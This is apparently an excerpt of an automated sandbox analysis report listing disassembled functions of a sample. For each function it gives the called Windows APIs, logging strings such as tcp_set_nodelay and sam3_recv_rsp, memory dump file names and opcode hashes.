Instruction ID: 8e8f1632efcf70731c77d9d74c904190025bfe4598a1f9742a00334741f9e840
Opcode Fuzzy Hash: d3d6cafc339255e44dc4f8f813a1e45e8922b849a73ed3aff8649ef9906618f3
Instruction Fuzzy Hash: B0F06261F0C64386F7315F69B8005B562A0EB94794F108235EDED837B8EE3CD9468B00

Function 00007FFE0EC02349 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33networkCOMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32 ref: 00007FFE0EC0236F
WSAGetLastError.WS2_32 ref: 00007FFE0EC0238D

Part of subcall function 00007FFE0EC02FD2: fwrite.MSVCRT ref: 00007FFE0EC0307E
Part of subcall function 00007FFE0EC02FD2: fflush.MSVCRT ref: 00007FFE0EC0308A

Strings

sock_set_blocking, xrefs: 00007FFE0EC0239D
[E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE0EC023A4

Memory Dump Source

Source File: 00000014.00000002.2559811045.00007FFE0EC01000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE0EC00000, based on PE: true

Associated: 00000014.00000002.2559796463.00007FFE0EC00000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559830630.00007FFE0EC12000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559846613.00007FFE0EC1B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559867290.00007FFE0EC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559886112.00007FFE0EC1F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559905319.00007FFE0EC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0ec00000_main.jbxd

Similarity

API ID: ErrorLastfflushfwriteioctlsocket
String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
API String ID: 325303940-110789774
Opcode ID: 038bd755b02e3f66869641aed01428454bc9ad9afd8f2a63b256f54e22478d64
Instruction ID: 870fc476feb7476d5cc8d1c48a009b682ab317de71b8f504275f92555c910757
Opcode Fuzzy Hash: 038bd755b02e3f66869641aed01428454bc9ad9afd8f2a63b256f54e22478d64
Instruction Fuzzy Hash: 0AF08B21F0C2D3AAF7145769A8841B91160EF84394F004132ECAD833F5DE3ED8468702

Function 00007FFE0E162209 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33networkCOMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32 ref: 00007FFE0E16222F
WSAGetLastError.WS2_32 ref: 00007FFE0E16224D

Part of subcall function 00007FFE0E161292: fwrite.MSVCRT ref: 00007FFE0E16133E
Part of subcall function 00007FFE0E161292: fflush.MSVCRT ref: 00007FFE0E16134A

Strings

[E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE0E162264
sock_set_blocking, xrefs: 00007FFE0E16225D

Memory Dump Source

Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd

Similarity

API ID: ErrorLastfflushfwriteioctlsocket
String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
API String ID: 325303940-110789774
Opcode ID: 3e4103bee5abb71778d63ab542923b9989150a137cd39017df41709a0e9334bd
Instruction ID: ccf33a5c32118901ec496bd670a40ee1e6eabfcbd21bca98c2352e6775a8bb95
Opcode Fuzzy Hash: 3e4103bee5abb71778d63ab542923b9989150a137cd39017df41709a0e9334bd
Instruction Fuzzy Hash: 16F09671F0D64386F7105769B8401B55260EF94794F108237EDAE837B5DE3CD94AC701

Function 00007FFE11501A0A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFE11501A3A
WSAGetLastError.WS2_32 ref: 00007FFE11501A51

Strings

[E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE11501A68
tcp_set_nodelay, xrefs: 00007FFE11501A61

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
API String ID: 1729277954-3534120083
Opcode ID: f4be86383b398c225cc35a14900dc2f2bc6b3d5b8b51f935d6a72211b772bdd5
Instruction ID: 2b5e8a3bdf79a0cf311df38fa03036a9ef22944664684041750a049ecc9a5efb
Opcode Fuzzy Hash: f4be86383b398c225cc35a14900dc2f2bc6b3d5b8b51f935d6a72211b772bdd5
Instruction Fuzzy Hash: 84F0F661B0890286F3105BABB8402BA7665AB843B0F009275ED2D837B4DF7CD98ACB01

Function 00007FFE1330152A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFE1330155A
WSAGetLastError.WS2_32 ref: 00007FFE13301571

Strings

tcp_set_nodelay, xrefs: 00007FFE13301581
[E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE13301588

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
API String ID: 1729277954-3534120083
Opcode ID: a9890d17be8931ba777a89cde027a022ff399b940b8433dea79f3717e2de508b
Instruction ID: ca4982b312aae620d7789e14e5bddbd0ed20f690f476adaf6c7559bb5fc8cd13
Opcode Fuzzy Hash: a9890d17be8931ba777a89cde027a022ff399b940b8433dea79f3717e2de508b
Instruction Fuzzy Hash: D4F0F661B089028EF3105B67B8005AA6660ABA87B4F004271ED7D937B5DF7CD94AC704

Function 00007FFE0EB44EBA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFE0EB44EEA
WSAGetLastError.WS2_32 ref: 00007FFE0EB44F01

Strings

[E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE0EB44F18
tcp_set_nodelay, xrefs: 00007FFE0EB44F11

Memory Dump Source

Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
API String ID: 1729277954-3534120083
Opcode ID: f73191922408c38ddcde4302cf36f1d3d11bbd068eba9f1f2a5320039dc8a134
Instruction ID: 0c50c3a0fcaea9f8db117fbf5e5b6d31f947e0e6e55d26d532de15909191020d
Opcode Fuzzy Hash: f73191922408c38ddcde4302cf36f1d3d11bbd068eba9f1f2a5320039dc8a134
Instruction Fuzzy Hash: 5AF096B2B186425AF3205F19B8006A56660EB88764F108231EDAD83BF4DF7DD945CF00

Function 00007FFE0EBD233A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFE0EBD236A
WSAGetLastError.WS2_32 ref: 00007FFE0EBD2381

Strings

tcp_set_nodelay, xrefs: 00007FFE0EBD2391
[E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE0EBD2398

Memory Dump Source

Source File: 00000014.00000002.2559714739.00007FFE0EBD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE0EBD0000, based on PE: true

Associated: 00000014.00000002.2559699117.00007FFE0EBD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559733043.00007FFE0EBE3000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559748990.00007FFE0EBEC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559764197.00007FFE0EBEF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559777530.00007FFE0EBF0000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0ebd0000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
API String ID: 1729277954-3534120083
Opcode ID: 368fcba44050ba1319e43864ff13c1c46c372c64a79d6944062e587744854559
Instruction ID: f7c67945d54c72f3016699402fcb5540ddc479ae630bad96004813edab8f1beb
Opcode Fuzzy Hash: 368fcba44050ba1319e43864ff13c1c46c372c64a79d6944062e587744854559
Instruction Fuzzy Hash: F0F09665B0C1428AF3305F19A8005B966A1EBC47A4F008231EDDD837B8DF7CD94ACF00

Function 00007FFE0EC0247A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFE0EC024AA
WSAGetLastError.WS2_32 ref: 00007FFE0EC024C1

Strings

[E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE0EC024D8
tcp_set_nodelay, xrefs: 00007FFE0EC024D1

Memory Dump Source

Source File: 00000014.00000002.2559811045.00007FFE0EC01000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE0EC00000, based on PE: true

Associated: 00000014.00000002.2559796463.00007FFE0EC00000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559830630.00007FFE0EC12000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559846613.00007FFE0EC1B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559867290.00007FFE0EC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559886112.00007FFE0EC1F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559905319.00007FFE0EC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0ec00000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
API String ID: 1729277954-3534120083
Opcode ID: 7cb9fb6779b5c95c1cc7d7e2f9da55888ed15e20daf20baedfc529e281c235e6
Instruction ID: 6847baad9809a775e0abf6694e098306a5663d149a0ce38e112db8c76d01c683
Opcode Fuzzy Hash: 7cb9fb6779b5c95c1cc7d7e2f9da55888ed15e20daf20baedfc529e281c235e6
Instruction Fuzzy Hash: 76F02B62B08192AAF3105F69F8842B66560BB843A0F008231ED9D837F5DF3DD546DB01

Function 00007FFE0E16233A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFE0E16236A
WSAGetLastError.WS2_32 ref: 00007FFE0E162381

Strings

tcp_set_nodelay, xrefs: 00007FFE0E162391
[E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE0E162398

Memory Dump Source

Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
API String ID: 1729277954-3534120083
Opcode ID: 6f2b0580ac5e605570fbaebc72f07140d3916ffc578ac77e8f5814e9907ee8f3
Instruction ID: 5a29a860c574cdaccfa7e62a096f580d5dbb35840b9e4c6de897eab532d3ee32
Opcode Fuzzy Hash: 6f2b0580ac5e605570fbaebc72f07140d3916ffc578ac77e8f5814e9907ee8f3
Instruction Fuzzy Hash: 7BF09671B085478AF3505B6AB8005B66661AB887A4F108237EDED837B5DF7CD589C700

Function 00007FFE11501A76 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 29networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFE11501A9E
WSAGetLastError.WS2_32 ref: 00007FFE11501AB5

Strings

tcp_set_keepalive, xrefs: 00007FFE11501AC5
[E] (%s) -> setsockopt(SO_KEEPALIVE) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE11501ACC

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(SO_KEEPALIVE) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_keepalive
API String ID: 1729277954-536111009
Opcode ID: 51a143680fcac23f95efcb46de4bc005422820b1c01712509800bcbb99f1957f
Instruction ID: 484e6f56c34f4edb3233ff91d97229afbfd934e566c1fc938109daba267b6fb4
Opcode Fuzzy Hash: 51a143680fcac23f95efcb46de4bc005422820b1c01712509800bcbb99f1957f
Instruction Fuzzy Hash: A7F0BB61B0894286F3105BA7B8405797A64BF88774F508375ED6D837B4DF7CD54A8B01

Function 00007FFE1150924C Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 72stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FFE11509285
strchr.MSVCRT ref: 00007FFE115092D1

Strings

[D] (%s) -> %s, xrefs: 00007FFE115092F2
sam3_recv_rsp, xrefs: 00007FFE115092EB

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: memsetstrchr
String ID: [D] (%s) -> %s$sam3_recv_rsp
API String ID: 2564583029-4292814133
Opcode ID: 236996f84fbe9f88ce6297d9ca011b89064f0fed0328767d615cc4ef45d0e1af
Instruction ID: 51764baa7d0f8a4be24244eed89b15c2b839d03061343da779ae6e25f6b72831
Opcode Fuzzy Hash: 236996f84fbe9f88ce6297d9ca011b89064f0fed0328767d615cc4ef45d0e1af
Instruction Fuzzy Hash: 88218122B0CE4341FB2155AB68243BD66594F427B0F5C93B4EE7D8A7F9EE1CA8425601

Function 00007FFE11509A40 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 52COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FFE11509A79
LeaveCriticalSection.KERNEL32 ref: 00007FFE11509AFB

Strings

ebus_dispatch, xrefs: 00007FFE11509ACA
[D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x), xrefs: 00007FFE11509AD1

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x)$ebus_dispatch
API String ID: 3168844106-1717220914
Opcode ID: 907b831c72d46e904700da3e0436979447e90e2a26e5c4a6095f1d20295a2932
Instruction ID: baf1a3e3098a6f73b62998b36b3189183f855c23186113d62ab59d4af1713565
Opcode Fuzzy Hash: 907b831c72d46e904700da3e0436979447e90e2a26e5c4a6095f1d20295a2932
Instruction Fuzzy Hash: F9214F32A08E4281EB519F56E84417D77B9FB84BA4F544175DA5D477B8EF3CD881C700

Function 00007FFE0EB4EE60 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 52COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FFE0EB4EE99
LeaveCriticalSection.KERNEL32 ref: 00007FFE0EB4EF1B

Strings

[D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x), xrefs: 00007FFE0EB4EEF1
ebus_dispatch, xrefs: 00007FFE0EB4EEEA

Memory Dump Source

Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x)$ebus_dispatch
API String ID: 3168844106-1717220914
Opcode ID: 53611b293818d15e9ce415c90b29aeb7aea56c18796fbd7426b48b77701d6037
Instruction ID: 1afcc7de5b9a81d86a42b0014893e3bfe4a033ec4e46f5a9b3cf3c1b9785655c
Opcode Fuzzy Hash: 53611b293818d15e9ce415c90b29aeb7aea56c18796fbd7426b48b77701d6037
Instruction Fuzzy Hash: BA21F972A18B8682EB709F15E840179A7A0FB84B98F144135DEDD8B778DF3CE891CB00

Function 00007FFE0EBD1780 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 52COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FFE0EBD17B9
LeaveCriticalSection.KERNEL32 ref: 00007FFE0EBD183B

Strings

ebus_dispatch, xrefs: 00007FFE0EBD180A
[D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x), xrefs: 00007FFE0EBD1811

Memory Dump Source

Source File: 00000014.00000002.2559714739.00007FFE0EBD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE0EBD0000, based on PE: true

Associated: 00000014.00000002.2559699117.00007FFE0EBD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559733043.00007FFE0EBE3000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559748990.00007FFE0EBEC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559764197.00007FFE0EBEF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559777530.00007FFE0EBF0000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0ebd0000_main.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x)$ebus_dispatch
API String ID: 3168844106-1717220914
Opcode ID: 2c23bc5151dd6815fe962a8ec99b3b803cdf94b3d23d6896db3c00dcb89a2e16
Instruction ID: 4ebd254fcb1284d6fed9895d10cd370cfe77ebcc34f771acc793b8ef74234778
Opcode Fuzzy Hash: 2c23bc5151dd6815fe962a8ec99b3b803cdf94b3d23d6896db3c00dcb89a2e16
Instruction Fuzzy Hash: 1721FC32A0DB8285EB75CF15E8401A9A7A4FB44B94F544135DADD87778EF3CD851CB00

Function 00007FFE0E161780 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 52COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FFE0E1617B9
LeaveCriticalSection.KERNEL32 ref: 00007FFE0E16183B

Strings

ebus_dispatch, xrefs: 00007FFE0E16180A
[D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x), xrefs: 00007FFE0E161811

Memory Dump Source

Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x)$ebus_dispatch
API String ID: 3168844106-1717220914
Opcode ID: 0c0d9bdad17875df5bb4ef919751a230e7192319deab9599f5929f643f9db2cd
Instruction ID: 1a072dc581b9dbf8eb64d4abab22adee32291fa74f6bed5571f0b81899f1d2e3
Opcode Fuzzy Hash: 0c0d9bdad17875df5bb4ef919751a230e7192319deab9599f5929f643f9db2cd
Instruction Fuzzy Hash: 27213B32A0AA8696EB609F25F84016967A4FB84B94B144136DEDD87A78DF3CE981C700

Function 00007FF6BFD627F7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF6BFD62715

Strings

fs_file_read, xrefs: 00007FF6BFD62752
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF6BFD62759

Memory Dump Source

Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true

Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: ab229aab2030bd151749b27b349bc1024d95e54e5932f5e3971a27717ef95fb5
Instruction ID: cf54222780b762a33e76de9bc6982e97a2dae426adc0b6d67c777dafb1df2f8c
Opcode Fuzzy Hash: ab229aab2030bd151749b27b349bc1024d95e54e5932f5e3971a27717ef95fb5
Instruction Fuzzy Hash: 82F05423B0860321FA529B5C74517B933411F41766E4D4B35DF498FAE1AE3DA987C340

